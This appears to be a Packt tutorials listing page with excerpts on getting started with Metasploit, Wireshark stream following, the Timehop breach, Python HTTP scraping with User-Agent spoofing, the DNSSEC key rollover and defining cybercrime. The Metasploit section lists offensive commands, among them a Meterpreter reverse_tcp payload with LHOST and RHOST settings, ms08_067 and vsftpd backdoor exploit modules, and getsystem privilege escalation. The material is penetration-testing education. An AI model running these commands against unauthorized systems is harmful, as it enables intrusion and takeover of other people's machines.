Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Cybersecurity

90 Articles
article-image-getting-started-metasploit
Packt
22 Jun 2017
10 min read
Save for later

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Read more
  • 0
  • 0
  • 17382

article-image-wireshark-working-packet-streams
Packt
11 Mar 2013
3 min read
Save for later

Wireshark: Working with Packet Streams

Packt
11 Mar 2013
3 min read
(For more resources related to this topic, see here.) Working with Packet Streams While working on network capture, there can be multiple instances of network activities going on. Consider a small example where you are simultaneously browsing multiple websites through your browser. Several TCP data packets will be flowing across your network for all these multiple websites. So it becomes a bit tedious to track the data packets belonging to a particular stream or session. This is where Follow TCP stream comes into action. Now when you are visiting multiple websites, each site maintains its own stream of data packets. By using the Follow TCP stream option we can apply a filter that locates packets only specific to a particular stream. To view the complete stream, select your preferred TCP packet (for example, a GET or POST request). Right-clicking on it will bring up the option Follow TCP Stream. Once you click on Follow TCP Stream, you will notice that a new filter rule is applied to Wireshark and the main capture window reflects all those data packets that belong to that stream. This can be helpful in figuring out what different requests/responses have been generated through a particular session of network interaction. If you take a closer look at the filter rule applied once you follow a stream, you will see a rule similar to tcp.stream eq <Number>. Here Number reflects the stream number which has to be followed to get various data packets. An additional operation that can be carried out here is to save the data packets belonging to a particular stream. Once you have followed a particular stream, go to File | Save As. Then select Displayed to save only the packets belonging to the viewed stream. Similar to following the TCP stream, we also have the option to follow the UDP and SSL streams. The two options can be reached by selecting the particular protocol type (UDP or SSL) and right-clicking on it. The particular follow option will be highlighted according to the selected protocol. The Wireshark menu icons also provide some quick navigation options to migrate through the captured packets. These icons include: Go back in packet history (1): This option traces you back to the last analyzed/selected packet. Clicking on it multiple times keeps pushing you back to your selection history. Go forward in packet history (2): This option pushes you forward in the series of packet analysis. Go to last packet (5): This option jumps your selection to the last packet in your capture window.: This option is useful in directly going to a specific packet number. Go to the first packet (4): This option takes you to the first packet in your current display of the capture window. Go to last packet (5): This option jumps your selection to the last packet in your capture window. Summary In this article, we learned how to work with packet streams. Resources for Article : Further resources on this subject: BackTrack 5: Advanced WLAN Attacks [Article] BackTrack 5: Attacking the Client [Article] Debugging REST Web Services [Article]
Read more
  • 0
  • 0
  • 16575

article-image-timehop-suffers-data-breach-21-million-users-data-compromised
Richard Gall
09 Jul 2018
3 min read
Save for later

Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8) the team explained that 'an access credential to our cloud computing enterprise was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization." Timehop has already acted to make necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on social media accounts. The team has deactivated the keys that allow the app to read and show users social media posts on their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated. How did the Timehop data breach happen? For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized users credentials. This user then conducted 'reconnaisance activities' once they had created a new administrative account. This user logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker then attempted to access the production database. Timehop then states that they "conducted a specific action that triggered an alarm" which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes. A measured response to a potential crisis It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.  Read next: Did Facebook just have another security scare? What security and systems specialists are planning to learn in 2018
Read more
  • 0
  • 0
  • 15994

article-image-scraping-web-python-quick-start
Packt
17 Feb 2016
9 min read
Save for later

Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW). (For more resources related to this topic, see here.) Accessing data from the Internet The WWW and Internet are based on a series of agreements called Request for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, behaviors of hosts and agents (servers and clients), and file formats, among other details. In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website. Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols to gather data through the Internet and the Python library modules that implement these protocols. Background briefing – the TCP/IP protocols The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol. This defines how messages can be routed between networks. Layered on top of IP is the TCP protocol to connect two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP, there's also UDP; it's not used as much for the kind of WWW data we're interested in. In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use will leverage the socket concept under the hood. The Internet RFCs defines a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP). Using http.client for HTTP GET The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of kinds of request types, including GET and POST. A web browser is one kind of client software we can use. This software makes GET and POST requests, and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules. The http.client module allows us to make GET and POST requests as well as PUT and DELETE. We can read the response object. Sometimes, the response is an HTML page. Sometimes, it's a graphic image. There are other things too, but we're mostly interested in text and graphics. Here's a picture of a mysterious device we've been trying to find. We need to download this image to our computer so that we can see it and send it to our informant from http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg: Here's a picture of the currency we're supposed to track down and pay with: We need to download this image. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg Here's how we can use http.client to get these two image files: import http.client import contextlib path_list = [ "/wikipedia/commons/7/72/IPhone_Internals.jpg", "/wikipedia/en/c/c1/1drachmi_1973.jpg", ] host = "upload.wikimedia.org" with contextlib.closing(http.client.HTTPConnection( host )) as connection: for path in path_list: connection.request( "GET", path ) response= connection.getresponse() print("Status:", response.status) print("Headers:", response.getheaders()) _, _, filename = path.rpartition("/") print("Writing:", filename) with open(filename, "wb") as image: image.write( response.read() ) We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them. We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python. We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method. For all of the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status code to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection. An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image. We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance. We're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for we don't care. We kept the filename in the filename variable. We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours. The HTTP GET request is what underlies much of the WWW. Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW. Changing our client information An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification. This information may be used by the web server to determine if a mobile device or desktop device is being used. We can use something like this: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14 This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 We can use something like this to appear to be an iPhone instead of a Python application: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53 We make this change by adding headers to the request we're making. The change looks like this: connection.request( "GET", path, headers= { 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', }) This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than might be provided to a full desktop computer that makes the same request. The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python. There are many more HTTP headers we can provide. The User-Agent header is perhaps most important to gather different kinds of intelligence data from web servers. You can refer more book related to this topic on the following links: Python for Secret Agents - Volume II: (https://www.packtpub.com/application-development/python-secret-agents-volume-ii) Expert Python Programming: (https://www.packtpub.com/application-development/expert-python-programming) Raspberry Pi for Secret Agents: (https://www.packtpub.com/hardware-and-creative/raspberry-pi-secret-agents) Resources for Article: Further resources on this subject: Python Libraries[article] Optimization in Python[article] Introduction to Object-Oriented Programming using Python, JavaScript, and C#[article]
Read more
  • 0
  • 0
  • 15858

article-image-redhat-shares-what-to-expect-from-next-weeks-first-ever-dnssec-root-key-rollover
Melisha Dsouza
05 Oct 2018
4 min read
Save for later

RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key that is at the center of the DNS security system- what is called  DNSSEC. The current key has been in place since July 15, 2010. This switching of the central security key for DNS is called the "Root Key Signing Key (KSK) Rollover". The above replacement was originally planned a year back. The procedure was previously postponed because of data that suggested that a significant number of resolvers where not ready for the rollover. However, the question is 'Are your systems prepared so that DNS will keep functioning for your networks?' DNSSEC is a system of digital signatures to prevent DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn’t up to date, the DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries. If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites! That being said, there’s good news for those who have been keeping up with recent DNS updates. Since this rollover was delayed for almost a year, most of the DNS resolver software has been shipping for quite some time with the new key. Users who have been up to date with this news will have their systems all set for this change. If not, we’ve got you covered! But first, let’s do a quick background check. As of today, the root zone is still signed by the old KSK with the ID 19036 also called KSK-2010. The new KSK with the ID 20326 was published in the DNS in July 2017 and is called KSK-2017. The KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK) and to sign the new KSK-2017. The rollover only affects the KSK. The ZSK gets updated and replaced more frequently without the need to update the trust anchor inside the resolver. Source: Suse.com You can go ahead and watch ICANN’s short video to understand all about the switch Now that you have understood all about the switch, let’s go through all the checks you need to perform #1 Check if you have the new DNSSEC Root Key installed Users need to ensure they have the new DNSSEC Root key ( KSK-2017) has Key ID 20326. To check this, perform the following: - bind - see /etc/named.root.key - unbound / libunbound - see /var/lib/unbound/root.key - dnsmasq - see /usr/share/dnsmasq/trust-anchors.conf - knot-resolver - see /etc/knot-resolver/root.keys There is no need for them to restart their DNS service unless the server has been running for more than a year and does not support RFC 5011. #2 A Backup plan in case of unexpected problems The RedHat team assures users that there is very less probability of occurrence of DNS issues. Incase they do encounter a problem, they have been advised to restart their DNS server. They can try to use the  dig +dnssec dnskey. If all else fails, they should temporarily switch to a public DNS operator. #3 Check for an incomplete RFC 5011 process When the switch happens, containers or virtual machines that have old configuration files and new software would only have the soon to be removed DNSSEC Root Key. This is logged via RFC 8145 to the root name servers which provides ICANN with the above statistics. The server then updates the key via RFC 5011. But there are possibilities that it shuts down before the 30 day hold timer has been reached. It can also happen that the hold timer is reached and the configuration file cannot be written to or the file could be written to, but the image is destroyed on shutdown/reboot and a restart of the container that does not contain the new key. RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust that users can have online! To know more about this rollover, head to RedHat’s official Blog. What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018 Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices Red Hat infrastructure migration solution for proprietary and siloed infrastructure  
Read more
  • 0
  • 0
  • 15705

article-image-introduction-cyber-extortion
Packt
19 Jun 2017
21 min read
Save for later

Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, explains how often we make the mistake of relying on the past for predicting the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything else we have seen before. The growth is exponential and the consequences are far reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything. (For more resources related to this topic, see here.) It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spillinginto the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which theoretically anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations and facilitate the spread of data in more ways than one. Keeping in mind the Internet’s nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption. In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cyber crime, and cyber security are perceptibly being found in the same sentence. Cyber crime –under defined and under regulated A massive problem encouraging the perseverance and evolution of cyber crime is the lack of an adequate unanimous definition and the under regulation on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition. Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creativelynamed actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller. The concept of cybercrime Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing withcomputers andnetworks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep record of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace trying to find a slipping crack. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information. Instead of identifying it as a single phenomenon, Majid Jar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Jar refers to Thomas and Loader’s working concept of cybercrime as follows: “Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network.” Jar elaborates the important distinction of this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming after resourceful criminals who constantly think of new ways to gain illegal advantages. Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime: Advanced cybercrime or high-tech crime Cyber-enabled crime The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes,for example crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism. We are much beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response. Cybercrime is conceptualized as a service embracing a commercial component.Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder. Critical attributes of cybercrime An abridged version of the cybercrime concept provides answers to three vital questions: Where are criminal activities committed and what technologies are used? What is the reason behind the violation? Who is the perpetrator of the activities? Where and how – realm Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so mustthe spearheads of lawenforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomesstagnant and futile. Why – motivation The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is not only imperative for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise and actions that should not have been classified as cybercrime could be charged with criminal prosecution. Who –the criminal deed component The action must be attributed to a perpetrator. Depending on the source, certain threats can be translated to the criminal domain only or expanded to endanger potential larger targets, representing an attack to national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts. Types of common cyber threats In their endeavors to raise cybercrime awareness, the United Kingdom'sNational Crime Agency (NCA) divided common and popular cybercrime activities by affiliating themwith the target under threat. While both individuals and organizations are targets of cyber criminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions. Cybercrime targeting consumers Phishing The term encompasses behavior where illegitimate e-mails are sent to the receiver to collect security information and personal details Webcam manager A webcam manager is an instance of gross violating behavior in which criminals take over a person's webcam File hijacker Criminals hijack files and hold them "hostage" until the victim pays the demanded ransom Keylogging With keylogging, criminals have the means to record what the text behind the keysyou press on your keyboard is Screenshot manager A screenshot manager enables criminals to take screenshots of an individual’s computer screen Ad clicker Annoying but dangerous ad clickers direct victims’ computer to click on a specific harmful link Cybercrime targeting businesses Hacking Hacking is basically unauthorized access to computer data. Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web and compromise people’s integrity and safety by intruding and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation. Distributed denial of service (DDoS) attacks When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are a bunch of controlled computers that stop legitimate access to online services for users. The system is unable to provide normal access as it cannot handle the huge volume of incoming traffic. Cybercrime in relation to overall computer crime Many moons have passed since 2001, when the first international treatythat targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention’s intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation. In The Understanding Cybercrime: A Guide to Developing Countries(Gercke, 2011), Marco Gercke makes an excellent final point: “Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems.” Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be kept in mind when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground to tackle persistent threats. Cybercrime localized – what is the risk in your region? Europol’s heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse. North and South America Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and providing residency to victims in the regions that participate in the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the total world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% percent of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there. Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single European Payment Area have been subject to losses from skimmed payment cards because of the distinct way 